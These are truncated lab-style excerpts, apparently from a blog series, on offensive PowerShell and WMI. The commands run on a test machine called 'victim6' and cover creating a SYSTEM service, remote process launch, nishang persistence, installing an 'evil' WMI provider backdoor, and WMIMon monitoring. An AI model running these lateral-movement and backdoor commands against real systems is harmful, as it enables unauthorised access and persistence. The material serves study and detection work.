Powershell * WMI

Lateral Movement Command Execution Win32_service

PS C:\Users\victim6\Downloads> (Get-CimClass -classname win32_service).cimclassmethods

Create a service:

PS C:\Users\victim6\Downloads> $servicetype = [byte] 16
PS C:\Users\victim6\Downloads> $ErrorControl = [byte] 1
PS C:\Users\victim6\Downloads> Invoke-WmiMethod -Class win32_service -name create -argumentlist $false, "Windows performance", $errorcontrol, $null, $null, "WinPerf", "C:\Windows\System32\calc.exe", $null, $servicetype, "Manual", "NT Authority\system", " "
PS C:\Users\victim6\Downloads> Get-WmiObject -class win32_service -filter 'name = "WinPerf"'

Start the service:

PS C:\Users\victim6\Downloads> Get-WmiObject…

Powershell * WMI

WMI Events

Extrinsic events: https://github.com/KurtDeGreeff/PlayPowershell

PS C:\Users\victim6\Downloads\PlayPowershell-master\PlayPowershell-master> . .\Get-WMINamespace.ps1
PS C:\Users\victim6\Downloads\PlayPowershell-master\PlayPowershell-master> $namespaces = Get-WMINamespace
PS C:\Users\victim6\Downloads\PlayPowershell-master\PlayPowershell-master> foreach ($ns in $namespaces) { Get-WmiObject -namespace $ns -list | where { $_.__SUPERCLASS -eq '__ExtrinsicEvent' } }
PS C:\Users\victim6\Downloads\PlayPowershell-master\PlayPowershell-master> Get-WmiObject -class win32_perfFormattedData_PerfOS_System
PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master> cd .\Utility\
PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> . .\Add-Persistence.ps1
PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Utility> help Add-Persistence -examples
PS C:\Users\victim6\Downloads\new\new\tool\tool> cd .\nishang-master\
PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master> cd .\nishang-master\
PS…

Powershell * WMI

WMI Blue Team tools

WMIMON -> tool to monitor WMI activities: https://github.com/luctalpe/WMIMon
Real-time event trace log (ETL) consumer for the WMI-Activity log.

PS C:\Users\victim6\Downloads\WMIMon-master\WMIMon-master\Downloads\WMIMon_Binaries> .\WMIMon.exe

On another PS session:

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Invoke-WmiMethod -Class win32_process -name create -ArgumentList calc.exe -ComputerName 192.168.222.130

In the previous PS session we can see the connection logged.

PS C:\Users\victim6\Downloads\new\new\tool\tool\nishang-master\nishang-master\Backdoors> Get-WmiObject -class win32_computersystem

WMI_Monitor: tool to log WMI…

Powershell * WMI

Backdoor with WMI

Win32_localadmins provider: one of the earlier PoC evil WMI providers: https://github.com/rzander/localadmins

Evil Network Connection WMI Provider: https://github.com/jaredcatkinson/EvilNetConnectionWMIProvider

Open the command prompt with admin rights in this path (C:\Users\victim6\Downloads\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider\bin\Debug):

C:\Users\victim6\Downloads\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider\bin\Debug>InstallUtil.exe EvilNetConnectionWMIProvider.dll

On another PS session, win32_netconnection now appears in the output:

PS C:\Users\victim6\Downloads> Get-WmiObject -class win32_net* -list
PS C:\Users\victim6\Downloads> Invoke-WmiMethod -class win32_netconnection -name RunPS -ArgumentList…